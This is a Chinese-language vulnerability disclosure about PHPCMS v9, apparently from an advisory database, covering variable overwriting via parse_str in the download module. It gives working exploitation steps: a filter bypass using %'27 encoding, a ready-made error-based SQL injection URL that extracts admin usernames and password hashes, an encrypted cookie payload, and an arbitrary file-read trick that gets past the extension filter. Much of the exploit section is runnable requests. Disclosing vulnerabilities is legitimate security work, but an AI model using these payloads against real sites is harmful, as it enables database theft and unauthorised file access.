1. 发布时间：2016-09-04
2. 公开时间：N/A
3. 漏洞类型：变量覆盖
4. 危害等级：高
5. 漏洞编号：xianzhi-2016-09-44267058
6. 测试版本：N/A

漏洞详情

phpcms/modules/content/down.php

public function init() {
        $a_k = trim($_GET['a_k']);
        if(!isset($a_k)) showmessage(L('illegal_parameters'));
        $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
        if(empty($a_k)) showmessage(L('illegal_parameters'));
        unset($i,$m,$f);
        parse_str($a_k);
        if(isset($i)) $i = $id = intval($i);
        if(!isset($m)) showmessage(L('illegal_parameters'));
        if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));
        if(empty($f)) showmessage(L('url_invalid'));
        $allow_visitor = 1;
        $MODEL = getcache('model','commons');
        $tablename = $this->db->table_name = $this->db->db_tablepre.$MODEL[$modelid]['tablename'];
        $this->db->table_name = $tablename.'_data';
        $rs = $this->db->get_one(array('id'=>$id));

$_GET['a_k']经过sys_auth解密之后 进入parse_str函数
if(isset($i)) $i = $id = intval($i);
且当$a_k中不存在$i时 $id不会被$i覆盖
parse_str()参数可控的话 就可以任意构造$id值进入下方sql查询
$rs = $this->db->get_one(array('id'=>$id));
由于经过sys_auth()解密 所以不存在非法字符被过滤的情况
sys_auth()函数其实就是dz的authcode() 不知道key想解密或者伪造内容几乎是不可能的
所以来看看系统调用中 有没有用户可控数据进入sys_auth函数来替我们生成注入payload
phpcms/libs/classes/param.class.php 行86

    public static function set_cookie($var, $value = '', $time = 0) {
        $time = $time > 0 ? $time : ($value == '' ? SYS_TIME - 3600 : 0);
        $s = $_SERVER['SERVER_PORT'] == '443' ? 1 : 0;
        $var = pc_base::load_config('system','cookie_pre').$var;
        $_COOKIE[$var] = $value;
        if (is_array($value)) {
            foreach($value as $k=>$v) {
                setcookie($var.'['.$k.']', sys_auth($v, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
            }
        } else {
            setcookie($var, sys_auth($value, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
        }
    }

$value参数经过sys_auth被设置到cookie
再看看有没有$value可控的地方
phpcms/modules/attachment/attachments.php 行238

 public function swfupload_json() {
        $arr['aid'] = intval($_GET['aid']);
        $arr['src'] = safe_replace(trim($_GET['src']));
        $arr['filename'] = urlencode(safe_replace($_GET['filename']));
        $json_str = json_encode($arr);
        $att_arr_exist = param::get_cookie('att_json');
        $att_arr_exist_tmp = explode('||', $att_arr_exist);
        if(is_array($att_arr_exist_tmp) && in_array($json_str, $att_arr_exist_tmp)) {
            return true;
        } else {
            $json_str = $att_arr_exist ? $att_arr_exist.'||'.$json_str : $json_str;
            param::set_cookie('att_json',$json_str);
            return true;            
        }
    }

aid被intval了 不行
filename被urlencode了 也不行
src正好 虽然经过了safe_replace函数的过滤 下面会说怎么绕过
这里可以看到 src经过json_encode之后被set_cookie()
json_encode并不会破坏我们的payload 所以只要看看怎么绕过safe_replace函数

function safe_replace($string) {
    $string = str_replace('%20','',$string);
    $string = str_replace('%27','',$string);
    $string = str_replace('%2527','',$string);
    $string = str_replace('','',$string);
    $string = str_replace('"','"',$string);
    $string = str_replace("'",'',$string);
    $string = str_replace('"','',$string);
    $string = str_replace(';','',$string);
    $string = str_replace('<','&lt;',$string);
    $string = str_replace('>','&gt;',$string);
    $string = str_replace("{",'',$string);
    $string = str_replace('}','',$string);
    $string = str_replace('\','',$string);
    return $string;
}

过滤了很多东西 基本上注入跨站都不太可能，不过init()方法中有个好东西parse_str()
parse_str()可是会自动urldecode()的噢
所以 如果我们提交id=b%'27经过safe_replace()就会变成id=b%27再经过parse_str() 就会初始化$id=b'成功引入单引号

测试方法

先根据init()函数逻辑来生成payload如下

&id=%'27 and (select 1 from (select count(%'2a),concat((select concat(username,0x3a,password) from v9_admin limit 1),floor(rand(0)%'2a2))x from information_schema.tables group by x)a)#&m=1&f=haha&modelid=2&catid=7&

%'27引入单引号
%'2a引入星号(因为星号也被safe_replace函数过滤了)
前后要加上& 因为经过json_encode 前后会加上其他数据 加上&之后 id就会独立的被parse_str()初始化了
再urlencode一下 提交

http://192.168.1.170/phpcms/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id%3D%25'27+and+(select+1+from+(select+count(%25'2a)%2Cconcat((select+concat(username%2C0x3a%2Cpassword)+from+v9_admin+limit+1)%2Cfloor(rand(0)%25'2a2))x+from+information_schema.tables+group+by+x)a)%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26&filename=asdfadsf

记录下返回COOKIE中的xxxx_attr_json

d515pn-KiZhUqh-gIddIcgWKki9WK9vxquneqront2XWWohUsNbxrpE-PgwVYEYwEXtR7fVrfIg1P99ewxvsV6c83WF89m4bw-nV2LaKWrMXtXh3Z4GcvPQrveoF2yqTsMkAaBWfNytC4j7CgE5i2eQWsXJbxrJCwPZHl1R2bl14m5feT2_ok3fcnciVhhuvAcjdXnLlQ-3gmyENTue5-hP57S20Yj7o7FFc0m14M3WUYwPpcd1ZMvltmv6fr3a2YRlOtC0siSh8YnIqAnvULDCpH0MpB9VcMclL_zD3nd9OwLW7lFz4AF9L14QaDDutfkj1y6dBVimSIhVcdeEvi6XHt_SVATbL4HcVjd5tBn0oFFcfLBEKf-gQvrqivSn_xoHqTroT19vIgtV2F82M39Tb0Wkexhp16tuwAOf83uw1nEy99hhfAD4-2xgD1g5gKTTi3it728PE_5phVE3g2bb8O9XPIGjVGWELyjJbIDOtSN4K377I5x6nTOGN7iYtlf9eD2HTzoukaeQvoKwtt96NH1cUCd6WgUtgjpCwaDASmdmNrZfR9C-m4Ulj6ohn1q8H_PF8ESnAsO-KpRmmPC3zrMn8jHdXSu5SRWU0A9KjsoXBODx1hmk5hLQ4JHdhqvVVFeI2eZTCoc_AUiur3_3S3BdVaQN4J3HDds7gg12dL2rMquMbCOxJe5yNvYFqjqY0jQQUu0LucZkvaHfiTA

然后提交给

http://192.168.1.170/phpcms/index.php?m=content&c=down&a_k=刚才拿到的cookie

view.png

再来说下任意文件读取 上面的payload改一下

&i=4&s=目录&m=1&f=文件名&d=1&modelid=2&catid=7&

就可以下载任意文件 不过有个过滤

if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(.|$)/i',$fileurl) ) showmessage(L('url_error'));

当然绕过也是非常轻松
比如下载index.php
只要改成index.p%'3cp 经过safe_replace变成index.p%3cp经过parse_str()变成index.p<p windows下就能读取到了